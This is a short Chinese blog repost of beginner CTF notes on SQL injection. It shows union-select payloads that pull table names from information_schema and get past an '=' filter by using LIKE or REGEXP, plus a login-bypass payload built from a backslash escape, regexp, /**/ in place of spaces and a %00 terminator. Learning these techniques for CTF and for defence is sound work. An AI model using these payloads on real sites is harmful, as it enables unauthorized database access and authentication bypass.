码迷,mamicode.com
首页 > 其他好文 > 详细

ctf比赛中常见的注入问题杂谈(持续更新)

时间:2019-10-06 09:30:46      阅读:127      评论:0      收藏:0      [点我收藏+]

标签:相等   data   博客   重复   bsp   nbsp   from   base   blog   

首先,虽然本人是小白,但是太过基础的sql注入问题也就不再重复的解释了。直接从常用的说起。

本文参考博客:https://www.cnblogs.com/milantgh/p/4274387.html

 

对我这个小白来说这是一篇很好的博客。

 

(1) 对于过滤了 ‘=‘ 的sql注入 ,有两个方法可以绕过,like 和 regexp。 即

id=1+union+select+1,group_concat(schema_table)+from+information_schema.tables+where+table_schema=database()#
id=1+union+select+1,group_concat(schema_table)+from+information_schema.tables+where+table_schema+like+database()#
id=1+union+select+1,group_concat(schema_table)+from+information_schema.tables+where+table_schema+regexp+database()#

三者是相等的。(regexp就是正则表达式的意思o,在某些情况下,可以用 username=‘\‘&password=‘||password/**/regexp/**/"^a";%00‘来绕过,注:/**/是用来代替空格的,;%00是用来闭合单引号的)

(2)明天再写。。。

ctf比赛中常见的注入问题杂谈(持续更新)

标签:相等   data   博客   重复   bsp   nbsp   from   base   blog   

原文地址:https://www.cnblogs.com/cioi/p/11626250.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!